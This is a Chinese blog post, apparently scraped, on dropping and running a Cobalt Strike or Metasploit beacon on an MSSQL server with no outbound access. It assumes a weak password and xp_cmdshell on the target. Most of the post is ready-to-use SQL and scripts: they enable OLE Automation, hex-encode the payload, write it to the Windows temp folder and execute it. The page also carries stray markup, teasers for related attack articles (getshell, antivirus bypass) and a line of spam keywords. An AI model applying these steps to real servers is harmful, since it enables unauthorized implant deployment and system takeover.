<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    MSSQL不出網文件落地上線方式

    一顆小胡椒2022-06-03 17:34:08

    聲明:該公眾號大部分文章來自作者日常學習筆記,也有部分文章是經過作者授權和其他公眾號白名單轉載,未經授權,嚴禁轉載,如需轉載,聯系開白。

    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。

    0x01 前言

    一個MSSQL非注入的場景:在內網掃描到一個MSSQL弱口令,支持xp_cmdshell,Administrator權限,但不能出網,DNS也出不了,那么我們該如何將文件落地到目標主機并執行上線呢?

    0x02 利用思路

    我們可以通過當前這臺能出網的主機開啟一個Socks代理連接不出網主機的MSSQL,然后再利用以下方式將PE文件落地到不出網的MSSQL主機,最終通過出網主機來中轉上線不出網主機。

    0x03 啟用OLE組件

    在執行命令或寫入文件時都需要用到sp_oacreate,這主要是用來創建OLE對象,所以需要先執行以下SQL語句來啟用“OLE Automation Procedures”組件。

    exec master.dbo.sp_configure 'show advanced options', 1RECONFIGUREexec master.dbo.sp_configure 'Ole Automation Procedures', 1RECONFIGURE
    

    0x04 EXE轉換HEX

    使用以下方式將生成的CS/MSF攻擊載荷文件轉換為HEX編碼,這里我找了幾個可以轉換HEX編碼的方法,Linux的xxd命令,python腳本,或者010editor編輯器,根據個人習慣選擇吧。

    (1) Linux exe -> hex

    xxd -ps beacon.exe hex.txt
    

    (2) python exe -> hex

    import binasciifilename = 'beacon.exe'with open(filename, 'rb') as f:    content = f.read()print(binascii.hexlify(content))
    

    (3) 010editor exe -> hex

    利用這種方式拷貝下來的HEX也能使用certutil.exe -decodehex正常解碼,但如果要用OLE組件寫入時就還需要做下處理,將空格、換行都刪掉,全部放在一行即可。

    0x05 EXE文件落地

    將我們上邊轉換好的HEX編碼放在第一行,加上0x,然后在本地的Navicat Premium數據庫管理工具中執行即可,這時可以看到cs.exe文件已經成功落地到目標主機的磁盤。

    注:xp_cmdshell組件調用的是cmd.exe,所以在利用這種方式寫入大文件時可能會出現字符長度限制等問題。

    DECLARE @DATA VARBINARY(MAX) = 0x-hex        DECLARE @filepath VARCHAR(MAX) = 'C:\\Windows\\temp\\cs.exe'        DECLARE @ObjectToken INT        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT        EXEC sp_OASetProperty @ObjectToken, 'Type', 1        EXEC sp_OAMethod @ObjectToken, 'Open'        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2        EXEC sp_OAMethod @ObjectToken, 'Close'        EXEC sp_OADestroy @ObjectToken        SELECT @filepath
    

    0x06 執行EXE上線

    這時再利用xp_cmdshell、sp_oacreate等方式去執行剛落地的cs.exe即可上線。這里我只是根據這種場景進行了簡單的模擬測試,不出網主機上線方式可參考我之前分享的。

    利用MSF上線斷網主機的思路分享利用goproxy http上線不出網主機利用Pystinger Socks4上線不出網主機 。

    xp_cmdshell:

    exec master..xp_cmdshell "cmd /c C:\\Windows\\temp\\cs.exe"
    

    sp_oacreate:

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c C:\\Windows\\temp\\cs.exe'
    

    mssql
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    朋友在項目中遇到這樣一個場景
    基礎介紹Microsoft SQL Server 是微軟開發的關系型數據庫管理系統。作為數據庫服務器,它是一種軟件產品,主要功能是根據其他軟件應用程序的請求存儲和檢索數據,這些應用程序可以在同一臺計算機上運行,也可以在網絡上的另一臺計算機上運行。SQL Server 默認開放的端口是 TCP 1433。判斷數據庫類型/*?數據庫中獨有的數據表,如果頁面返回正常即可表示為?為便于管理數據庫中的權限,SQL Server 提供了若干角色,這些角色是用于對其他主體進行分組的安全主體。
    Mssql繞過360拿到webshell
    2022-08-23 16:09:39
    通過--sql-shell 來手動開啟EXEC sp_configure 'show advanced options', 1;當sqlmap啟動xp_cmdshell組件執行失敗的時候還會嘗試去開啟sp_OACreate,手動執行語句為:EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;通過以上的操作來尋找目錄的地址,然后通過以上的操作來寫文件就可以了后來通過同服旁站的查詢發現另外一個站點上的目錄上文件有報錯,同樣可以發現路徑來嘗試寫到另一個站點上,高權限
    有時候mssql注入會碰到-os-shell執行不了命令的情況,有可能是因為權限不夠不能開啟xp_cmdshell,還有可能就是殺軟攔截了 常見的只有360會攔截,如果被攔截了就是下面這樣的
    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。
    Mssql 從測試到實戰
    2022-05-23 07:12:19
    支持主機存活探測、端口掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計劃任務反彈shell、讀取win網卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能。項目地址:http://sqlmap.org/3、多種數據庫管理工具工具一:HeidiSQLHeidiSQL 是免費軟件,其目標是易于學習。
    實例配置指定SQL Server實例的名稱和實例ID。實例ID將成為安裝路徑的一部分。在命名實例中輸入 實例名,在實例ID中輸入實例ID,這里可以保持默認,如果存在已有實例,請注意不要重名。進入服務器配置,設置服務帳戶和排序規則。Microsoft建議您對每個SQL Server服務使用單獨的帳戶。選擇SQL Server數據庫引擎和SQL Server Browser類型位自動。
    上周在先知社區看到@Xgstar師傅寫的《SQLserver寫Webshell總結-突破中文路徑》文章中提到一個利用批處理寫Webshell至中文路徑的思路,但最后他并沒有成功利用這個思路寫入Webshell。 因為之前也寫過這類場景的利用思路,所以就想對他提到的這個思路以及遇到的問題簡單測試下,關于更多寫Webshell至中文路徑的思路可參考我之前寫的《MSSQL高權限注入寫馬至中文路徑》。
    在滲透測試過程中遇到了MSSQL數據庫,市面上也有一些文章,不過大多數講述的都是如何快速利用注入漏洞getshell的,對于MSSQL數據庫的注入漏洞沒有很詳細地描述。在這里我查閱了很多資料,希望在滲透測試過程中遇到了MSSQL數據庫能夠相對友好地進行滲透測試,文章針對實戰性教學,在概念描述方面有不懂的還請自行百度,謝謝大家~
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类